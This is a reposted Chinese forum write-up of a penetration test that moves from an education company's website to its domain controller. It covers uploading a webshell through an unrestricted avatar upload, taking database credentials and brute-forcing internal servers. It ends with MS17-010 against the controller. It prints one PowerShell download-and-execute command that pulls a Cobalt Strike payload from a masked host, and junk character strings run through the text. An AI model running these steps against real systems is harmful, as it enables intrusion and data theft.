|
2 n4 H5 e: X F+ ?3 n u* x# d I
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
. t9 q& h9 ? J& Z, b
' ^2 q, q3 J3 } a
/ K8 E7 N, Q, Q5 T( P$ Q. Z
9 e& a) w2 N. J! b& f" Y1 b2 ]
u; ]* D/ p$ a `6 Q. u* ? R o( R. q4 O/ m7 Q
正文
: s- U& d5 r2 l, P( b* T) H
6 H) g$ c$ R- K; U" m
( c' m l& u& u( B. |9 j6 L; B/ S
# d7 L4 n1 b! j" l7 G2 u* z/ q7 d , ]0 T3 m' ]& w& q) d
' A4 Z- [- {, h" k
目标:www.xxxx.com(一家教育机构)
& ~2 U" P! @9 }) h* S打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, ^( W# F4 o- ?: |. f4 S
4 c7 }3 O2 C& h0 e2 x& J* V4 t
) B9 z% b) H: |
- S( r0 o0 k* z9 @2 G2 \ 3 k$ Z4 B7 j H; n
5 n, M$ I g) _. H" W
进行了简单的信息搜集 9 `( ~* ^. d6 D; [" _. k+ D
! C2 p1 M+ v9 u; _. W$ B+ r7 z3 z L+ |
* i! U* m- A7 l# S/ X7 j+ b/ U& e$ p" Z& m9 w1 U- \0 {! A
子域名搜集
. _2 \4 ?% F' r' s( B Q
/ @3 ^% T* z; y3 ~+ \/ p
- C: h. S3 f8 v6 K# N : t) t- h' x% ?" M! i7 R
! R' ?# b# `" k; G9 i
1 V* P; N# c& N2 U# z! E
fofa找资产
' C I& R0 r* j6 ~6 C7 A ; m% E2 [& W+ X% A; u
- H" B5 J: E, I- u% J) |2 ?4 W + n1 P9 x& a* L9 p, [% `
+ v7 i. B% X3 ?, R! k" f4 Y/ u" S
- {$ O" O! C5 V! V& b/ U) w- o7 t
3 v. G4 Q- i' z! ]8 x: ~* l
3 d! f2 Z8 }6 A' j 一共七个资产。去重之后只有两个。 . Z- L @: E) p( l& J0 X) D3 N# }
7 i$ n1 f8 T( Z
; u3 }3 ]4 A" D, i; P
: [& P$ E5 c7 y) W. i7 ~# t
: D9 x+ f7 Z# d- x5 a3 Q+ T" E 目录探测
6 j" V" }& H5 T/ Z * X; M0 R, x& Q, L
% o0 }5 A# w8 k7 m3 A: f% y2 _7 f
' I7 v+ v7 ~8 s4 Z
+ L# U9 [$ s: L# O5 ]# l2 b: K8 l7 [5 @ Z& X4 `& h% d* S
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 - Q8 M8 J1 V4 L- V/ X$ e, I
; [/ S& Q+ [4 ~% J# r$ z. X1 f5 _- r' |+ P- V! O6 P& \
) ^# I* D3 D% z1 Y, u; H0 r% w+ K# G" C$ p- A
我又尝试了通过修改返回包来绕过登录界面# M( X6 l, `' \
$ ~9 D. y, x0 o% Q* b( U8 ?* L- @* w; J( e
5 \, }' N+ D+ |& D* E q S 9 o- Q; x! v0 [- V0 i9 D
- Z3 O0 l4 K S: _; u' o# J7 I5 U% W8 V) X* \# M: X F L- w2 X, @; t
还是不行,尝试注入无果1 K2 K4 K$ S; O+ e; ~
u) H6 V9 T- R# x+ ^3 ~* D+ `
" q/ k! Z# |. X! h+ x
; r7 {$ |* g( D- K4 s) w! F( \% c3 t7 o $ |5 n# z/ ^$ m4 |0 I
4 f" u* W1 m7 v$ F1 b
不过我目录探测出了一处Spring信息泄露 ' l5 S0 \. r; X: R1 g( ~
* j3 W' f7 G$ ~* b1 C
6 Z% t$ R1 C% f; h; ]! r/ C
' i( N0 A `7 B1 |$ X' t+ }9 Q& l; D7 T' T6 r- y4 n$ C
& }4 L: }# ?4 ~) J. b ; \; r3 r2 `# e: x! k
( [( T: ~4 B8 M$ V! k 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录1 ^, {1 \5 ~ y9 X
2 |1 _1 z7 l6 G. ]
4 V6 ^: V! E( i4 _, k$ A0 z+ ]$ P
( z0 d0 }2 x$ l- L+ G ; S6 T- G% S4 V. R
# I: [1 r2 m: s1 V 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
, V! R7 N; v8 V# q
$ n" I6 W" M4 T. z8 C* w0 g- G" d7 m: _: s4 H) V3 |! B' u. h7 ^
$ y0 _" G0 I; k" F" U: M % F8 K; m# L" y
# k9 d# s* F3 U/ `# o
获取有些师傅到这一步就手机抓包电脑测了。8 o7 t- H* Z) L: O5 e% p
, }$ A# V( K9 P0 H
. e$ e7 T3 J- f- r# O Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。8 h2 f8 \. |5 |* W5 ?9 H/ |. I& p# G
! A/ y3 V# o% Q! W. @9 d7 Q6 y6 n; {! S( K+ }1 [4 `3 |' O. S R
其中在一个公众号发现了小程序,可以进行注册。; p. d1 z/ G$ n- Z( Z" m# i3 I% M
4 H: w- h- S7 [
x6 I2 n. W- g# s, ~! y 看到了头像上传,尝试上传获取WebShell& E* k7 _: t% i4 K3 ~/ u a$ H
2 W% z& L! T/ _
/ }$ @, u0 h. B; S& b4 t5 Z ) d- I; p6 R; d8 I% L' e& Q1 y
( H' w! R5 J+ D4 I2 k6 ]7 q2 N: ^7 q2 }# o( |8 ]: `
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
- w1 A0 B) c' c0 O7 e- u/ k
5 C5 |5 y, l9 ?% o: N# m
: \5 I& `; G; s. g$ } ) J1 a; w/ J( F7 z( t1 j. R% C8 n
7 Y' A* |- _) V3 C
1 c5 G' d v# D( t- a3 [+ a( C 然后上了大马+ w# x5 g. ^$ @6 r, l1 P$ M l- F" E! b
7 S1 E$ E* x; O3 N9 p9 C6 k, \# ~: K2 d$ G; c
1 K3 d4 Q8 L. C/ M5 H + w9 G3 u4 F& C# o2 S
- _# P M8 [9 z c
* Z9 ~0 I" Z$ h3 ]3 J
) ]8 O: I1 E( B3 C( Y; x$ J9 Y" c7 x8 `
通过翻找文件发现数据库账号密码9 g& j( [+ C- Y+ b+ s1 ?1 ?
2 x' D9 ~ H" ~
" ~$ P. M+ p: F# o( D" O
, ?6 i$ \6 {7 _0 B# W
5 \8 J1 H. E9 y r6 u& D9 I" F. q9 t
--内网渗透* H$ u; ~8 x0 i' T+ f: T7 T
. [+ } y; ?( }( f6 E" I
6 A; I9 i4 m9 s8 y8 E! }
直接通过powershell执行 cs上线
/ j9 T) N1 |9 B1 F4 U & S0 s! [ M; J
5 _/ z; {( G: D3 D* {% x$ X
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
% l+ |$ P; }& m( s( K+ z , S' D' t& ]% ^7 W" m
. {9 P7 ]0 Y( W/ J# u+ v& R
5 J! S7 M1 W' ?. `- w 2 u, n- [+ b& p/ T5 ^3 v4 x
& V3 L4 C' b$ B( \+ R3 t: r; X$ G
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
3 T( ~* W1 e0 M# K w! Y* Q a! ^9 T
4 ~+ P3 X# o: O; H+ R1 F# e# M
+ Q/ h5 L0 |, s9 s8 } 0 C, i, k2 g& [9 R2 f8 T
" d" k( H* |; C" c! ^" p& C
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 " k- c$ ^5 y0 z+ H2 c
1 x" h- p6 E+ e, `5 {$ X" m
3 Z$ k. M! ^& s* Q. T: g2 K. C( O$ H, r) g! y: Q4 q
! Q2 G) Q& T5 r+ S+ l; t; Y( R, h( A; T* [
5 L$ l' b N; H4 X8 a1 R5 t
" J8 }6 l% @5 y' y* R, t9 q0 r( U% x
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 0 b$ z h# G; o
+ @1 I8 R$ E5 Z& ^% R1 _1 I+ V4 R8 a
8 O2 I. f8 {1 ?1 P
/ e) _: o( A3 Z
* q+ I, F- T3 D ( @4 V* H3 R* O; p4 k4 ^5 w
4 k9 |6 _) `+ W* s4 ^7 r
9 J+ Q* ~, `& a8 b) \( s; p7 I
, v ^: `2 J4 @+ a5 i, ]6 J: k, P% x0 d# t
" O% F' V" U0 n- D0 z7 T2 M1 _; D. e# H# J& M
# v, R# M) O' Z) K7 U l
3 b- ^! ~! F" S2 |4 ` b7 ~6 T
* }% ]1 |) o. D 小结
5 R W) ]6 d2 ]8 r( `
, Q2 V. q0 S1 q; `. f: z
3 p! ^5 m# R5 C0 V- Y. Y- c
% o8 ^" C) `9 G1 M! B- D # B! c, j/ e, e2 f+ @+ C
+ z$ K+ F* E2 |" O; R. c% V 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!7 w2 t7 n2 P6 D
3 h7 R' N6 {) L3 K+ C! S3 n) u/ z
1 h2 a) W& ]) i$ l$ L5 q
* m! t& \; M! O( E) j
( S$ V5 a; r" t/ }$ R
) e; B8 E2 }$ c8 I( F3 o - 8 t" I# x0 F, d' n m
3 P% m& P; l/ @# ~
1 ^" ^0 S! [/ O( ^. V - ' R8 D8 q; ]1 w5 v; m3 s
3 J0 q* q. q$ @3 m
4 U) j* Y# B+ L1 }
' g1 B5 M: e$ W) K8 a( r% n; n4 y
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html8 A! O$ \5 y2 b1 e( u- @4 ~
! ~/ `0 s$ d2 _
5 b* h0 C+ b5 X4 o1 O# i1 q4 b2 q
8 y* T8 N' w9 t' {( C3 o |